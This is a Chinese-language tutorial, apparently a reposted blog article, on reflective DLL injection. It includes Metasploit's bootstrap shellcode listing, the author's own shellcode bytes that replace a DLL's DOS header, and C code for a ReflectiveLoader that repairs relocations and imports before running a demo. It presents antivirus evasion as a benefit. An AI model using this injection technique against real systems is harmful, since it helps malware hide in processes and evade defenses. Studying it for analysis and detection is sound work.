一、reflective dll injection 反射注入介紹

網(wǎng)上對(duì)反射注入的定義是只通過(guò)內(nèi)存把DLL注入到特定進(jìn)程中，也就是說(shuō)整個(gè)過(guò)程都不涉及文件操作。

優(yōu)點(diǎn)

• 規(guī)避殺軟基于文件系統(tǒng)的檢測(cè)

• 不會(huì)在進(jìn)程的DLL鏈表里留下記錄

• 通過(guò)特殊處理，可以使用正常的方式編寫DLL，實(shí)現(xiàn)shellcode的效果

缺點(diǎn)

• DLL體積較大，相比于shellcode注入，更容易被檢測(cè)

二、修改dos頭，填入精心構(gòu)造的 bootstrap shellcode

metasploit 實(shí)現(xiàn)的bootstrap shellcode非常精妙，它保留了正常DLL的特征

dec ebp ; M pop edx ; Z call 0 ; call next instruction pop ebx ; get our location (+7) push edx ; push edx back inc ebp ; restore ebp push ebp ; save ebp mov ebp, esp ; setup fresh stack frame add ebx, 0x???????? ; add offset to ReflectiveLoader call ebx ; call ReflectiveLoader mov ebx, eax ; save DllMain for second call push edi ; our socket push 0x4 ; signal we have attached push eax ; some value for hinstance call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket ) push 0x???????? ; our EXITFUNC placeholder push 0x5 ; signal we have detached push eax ; some value for hinstance call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk ) ; we only return if we don't set a valid EXITFUNC Listing 1: Bootstrap Shellcode.

我這里自己實(shí)現(xiàn)了一個(gè)更簡(jiǎn)單的。

將DOS頭從MZ標(biāo)記開始的字節(jié)替換為shellcode，功能是跳轉(zhuǎn)到ReflectiveLoader函數(shù)

shellcode如下：

E8 00000000 | call $0 | 將下一條指令的地址壓棧
58 | pop eax | 將當(dāng)前指令的地址彈到eax
83E8 05 | sub eax,5 | 減5字節(jié)得到第一條指令的地址，得到DLL基址ImageBase
50 | push eax | ImageBase壓棧，傳給ReflectiveLoader函數(shù)
05 00100000 | add eax,1000 | 基址+偏移找到ReflectiveLoader函數(shù)地址
FFD0 | call eax | 調(diào)用ReflectiveLoader函數(shù)

E8 00 00 00 00 58 83 E8 05 50 05 60 15 00 00 FF D0

其中倒數(shù)第二條指令 add eax,xx 每次編譯后可能都會(huì)變，因此指令也要每次修改。

然后，把DLL拉伸成內(nèi)存鏡像的形式，實(shí)際上就是遍歷節(jié)表，把所有的節(jié)從文件對(duì)齊的位置復(fù)制到內(nèi)存對(duì)齊的位置。

這樣處理之后，DLL已經(jīng)初步具備了shellcode的特征，它可以像shellcode一樣被執(zhí)行了，但是還有很多重要的工作沒(méi)有完成。

三、ReflectiveLoader 函數(shù)

需要完成兩項(xiàng)工作：

• 修復(fù)重定位表
• 修復(fù)IAT表

完成這兩項(xiàng)之后，就可以調(diào)用任意API和自己編寫的函數(shù)，到此為止，這個(gè)DLL在使用上已經(jīng)和普通shellcode沒(méi)什么區(qū)別了（除了體積比shellcode大得多）。

顯然，這樣寫代碼比寫shellcode簡(jiǎn)單多了，shellcode需要時(shí)刻注意不能使用全局變量，字符串常量，還不能調(diào)用別的函數(shù)，所有功能都要在一個(gè)函數(shù)里完成；而使用反射注入方式編寫的DLL，絕大部分代碼都是正常編寫的，我們只需要寫非常少的shellcode以及編寫幾個(gè)用于修正DLL內(nèi)數(shù)據(jù)的函數(shù)就行了。

extern "C" __declspec(dllexport) void ReflectiveLoader(DWORD dwImageBase) {// 需要先修復(fù)重定位表，因?yàn)榇藭r(shí)所有硬編碼跳轉(zhuǎn)的地址都是錯(cuò)的// ReflectiveLoader可以調(diào)用SetNewImageBase是因?yàn)榫幾g器使用E8 CALL，這兩個(gè)函數(shù)之間的偏移在編譯時(shí)就確定了，就不會(huì)出錯(cuò)// 如果編譯器使用 FF 15 CALL ，就不能這么做了，所以最安全的做法就是把修復(fù)重定位表的工作放在ReflectiveLoader里做完// 修復(fù)重定位后，就可以調(diào)用DLL內(nèi)的函數(shù)和全局變量了SetNewImageBase((LPVOID)dwImageBase, dwImageBase);// 通過(guò)PEB獲取 LoadLibrary 和 GetProcAddress// 獲取這兩個(gè)函數(shù)，待會(huì)修復(fù)IAT表要用GetLoadlibAndGetproc();// 修復(fù)IAT表// 修復(fù)IAT表后，就可以調(diào)用API了RepairIAT((LPVOID)dwImageBase);// 執(zhí)行任意正常編寫的代碼，從這開始就不需要寫shellcode了MessageBoxA(0, "Reflective Inject success, now we can call any API normally!", 0, MB_OK);printf("printf test.\n");system("calc.exe");ExitProcess(0); }

四、注意事項(xiàng)

關(guān)閉 C/C++ 常規(guī) 支持僅我的代碼調(diào)試/JMC

這玩意開了的話會(huì)在代碼里加一些棧溢出校驗(yàn)函數(shù)，這些函數(shù)會(huì)在我們修復(fù)重定位IAT之前使用錯(cuò)誤的地址，所以必須關(guān)掉。

同理，也要把/GS運(yùn)行時(shí)安全檢查關(guān)掉，這個(gè)選項(xiàng)也會(huì)加入一些校驗(yàn)函數(shù)。這個(gè)選項(xiàng)在debug模式下沒(méi)有影響，release下就會(huì)運(yùn)行時(shí)崩潰。

總結(jié)一下就是，我們要把所有編譯器鏈接器可能自己添加代碼的功能盡可能關(guān)掉，不然它們?cè)谛迯?fù)工作開始前就調(diào)用，就會(huì)出錯(cuò)。

下面給出編寫shellcode的典型配置，出自《Rootkit 系統(tǒng)灰色地帶的潛伏者 原書第2版》

總結(jié)

以上是生活随笔為你收集整理的reflective dll injection 反射注入的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。